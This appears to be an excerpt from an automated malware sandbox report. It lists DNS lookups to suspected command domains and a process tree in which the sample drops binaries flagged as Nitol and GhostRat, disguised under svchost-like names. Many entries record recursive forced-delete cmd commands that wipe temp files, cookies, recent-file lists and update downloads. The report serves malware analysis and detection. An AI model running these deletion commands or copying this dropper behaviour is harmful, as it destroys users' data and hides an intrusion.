Dec 23, 2024 09:01:43.420120001 CET	192.168.2.9	1.1.1.1	0x673f	Standard query (0)	www.af0575.com	A (IP address)	IN (0x0001)	false
Dec 23, 2024 09:01:47.859332085 CET	192.168.2.9	1.1.1.1	0x3bd3	Standard query (0)	www.af0575.com	A (IP address)	IN (0x0001)	false
Dec 23, 2024 09:01:53.763612032 CET	192.168.2.9	1.1.1.1	0x61c8	Standard query (0)	www.fz0575.com	A (IP address)	IN (0x0001)	false
Dec 23, 2024 09:01:58.220653057 CET	192.168.2.9	1.1.1.1	0x410	Standard query (0)	www.fz0575.com	A (IP address)	IN (0x0001)	false
Dec 23, 2024 09:02:38.731265068 CET	192.168.2.9	1.1.1.1	0x672f	Standard query (0)	chinagov.8800.org	A (IP address)	IN (0x0001)	false
Dec 23, 2024 09:03:15.948908091 CET	192.168.2.9	1.1.1.1	0xe1bf	Standard query (0)	www.wk1888.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 23, 2024 09:01:30.498198986 CET	1.1.1.1	192.168.2.9	0x90b7	No error (0)	chinagov.8800.org		8.7.198.46	A (IP address)	IN (0x0001)	false
Dec 23, 2024 09:01:30.498219967 CET	1.1.1.1	192.168.2.9	0x90b7	No error (0)	chinagov.8800.org		8.7.198.46	A (IP address)	IN (0x0001)	false
Dec 23, 2024 09:01:32.799855947 CET	1.1.1.1	192.168.2.9	0x61f8	Name error (3)	www.wk1888.com	none	none	A (IP address)	IN (0x0001)	false
Dec 23, 2024 09:01:33.028306007 CET	1.1.1.1	192.168.2.9	0x1ee1	Name error (3)	www.af0575.com	none	none	A (IP address)	IN (0x0001)	false
Dec 23, 2024 09:01:33.212970972 CET	1.1.1.1	192.168.2.9	0x3740	Name error (3)	www.wk1888.com	none	none	A (IP address)	IN (0x0001)	false
Dec 23, 2024 09:01:33.213119030 CET	1.1.1.1	192.168.2.9	0x2dc8	Name error (3)	www.fz0575.com	none	none	A (IP address)	IN (0x0001)	false
Dec 23, 2024 09:01:43.557501078 CET	1.1.1.1	192.168.2.9	0x673f	Name error (3)	www.af0575.com	none	none	A (IP address)	IN (0x0001)	false
Dec 23, 2024 09:01:47.996969938 CET	1.1.1.1	192.168.2.9	0x3bd3	Name error (3)	www.af0575.com	none	none	A (IP address)	IN (0x0001)	false
Dec 23, 2024 09:01:53.901804924 CET	1.1.1.1	192.168.2.9	0x61c8	Name error (3)	www.fz0575.com	none	none	A (IP address)	IN (0x0001)	false
Dec 23, 2024 09:01:58.358697891 CET	1.1.1.1	192.168.2.9	0x410	Name error (3)	www.fz0575.com	none	none	A (IP address)	IN (0x0001)	false
Dec 23, 2024 09:02:39.132702112 CET	1.1.1.1	192.168.2.9	0x672f	No error (0)	chinagov.8800.org		46.82.174.69	A (IP address)	IN (0x0001)	false
Dec 23, 2024 09:03:16.086868048 CET	1.1.1.1	192.168.2.9	0xe1bf	Name error (3)	www.wk1888.com	none	none	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	03:01:24
Start date:	23/12/2024
Path:	C:\Users\user\Desktop\G3izWAY3Fa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\G3izWAY3Fa.exe"
Imagebase:	0x400000
File size:	963'286 bytes
MD5 hash:	118F7F61B6AFB1DA5E94EA1740222C73
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:01:25
Start date:	23/12/2024
Path:	C:\Windows\Temp\v5.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\temp\v5.exe"
Imagebase:	0x400000
File size:	16'896 bytes
MD5 hash:	48A02F4A003E8CBE683CF5DADA237168
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 100%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:01:25
Start date:	23/12/2024
Path:	C:\Windows\Temp\server.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\temp\server.exe"
Imagebase:	0x400000
File size:	196'608 bytes
MD5 hash:	8A953A49796B7F8C7539A6B2BC175397
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000002.2681095838.0000000000650000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: gh0st, Description: unknown, Source: 00000003.00000002.2681095838.0000000000650000.00000004.00001000.00020000.00000000.sdmp, Author: https://github.com/jackcr/ Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000002.2705358503.0000000002A5D000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security Rule: gh0st, Description: unknown, Source: 00000003.00000002.2705358503.0000000002A5D000.00000004.00000010.00020000.00000000.sdmp, Author: https://github.com/jackcr/
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 95%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	03:01:25
Start date:	23/12/2024
Path:	C:\Windows\Temp\v5.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\temp\v5.exe
Imagebase:	0x400000
File size:	16'896 bytes
MD5 hash:	48A02F4A003E8CBE683CF5DADA237168
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	03:01:25
Start date:	23/12/2024
Path:	C:\Windows\Temp\ .exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\temp\ .exe"
Imagebase:	0x400000
File size:	1'429'612 bytes
MD5 hash:	CCEE0912E79D434F0D2C1E11274F23C0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 4%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	03:01:26
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:01:26
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:01:31
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\033726\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\033726\svchost.exe"
Imagebase:	0x400000
File size:	196'608 bytes
MD5 hash:	00C090DAE3EE360E575655FE89121D83
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000008.00000002.2706650103.000000001007A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 95%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	03:01:36
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\034031\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\034031\svchost.exe"
Imagebase:	0x400000
File size:	196'608 bytes
MD5 hash:	B573CCA4145727C22E1AD6774DBF3705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 0000000A.00000002.1431291554.000000001007A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	03:01:38
Start date:	23/12/2024
Path:	C:\Windows\XXXXXX05CA35CC\svchsot.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\XXXXXX05CA35CC\svchsot.exe"
Imagebase:	0x400000
File size:	196'608 bytes
MD5 hash:	8A953A49796B7F8C7539A6B2BC175397
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 0000000B.00000002.1452368472.000000001007A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 95%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	03:01:46
Start date:	23/12/2024
Path:	C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe"
Imagebase:	0x400000
File size:	196'608 bytes
MD5 hash:	00C090DAE3EE360E575655FE89121D83
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 0000000D.00000002.1534647455.000000001007A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	03:01:48
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	03:01:48
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	03:01:48
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
Imagebase:	0x7ff70f010000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	03:01:48
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	03:01:48
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	03:01:48
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	03:01:48
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	03:01:48
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	03:01:48
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	03:01:48
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	03:01:48
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	03:01:48
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	03:01:49
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	03:01:49
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	03:01:51
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	03:01:51
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	03:02:07
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	03:02:07
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	03:02:07
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	03:02:07
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	03:02:07
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	03:02:07
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	36
Start time:	03:02:07
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	03:02:07
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	03:02:07
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	03:02:07
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	03:02:08
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	03:02:08
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	03:02:08
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	03:02:08
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	03:02:08
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	03:02:08
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	03:02:56
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	49
Start time:	03:02:56
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	03:02:56
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	51
Start time:	03:02:56
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	03:02:56
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	03:02:56
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	03:02:56
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	55
Start time:	03:02:56
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	56
Start time:	03:02:56
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
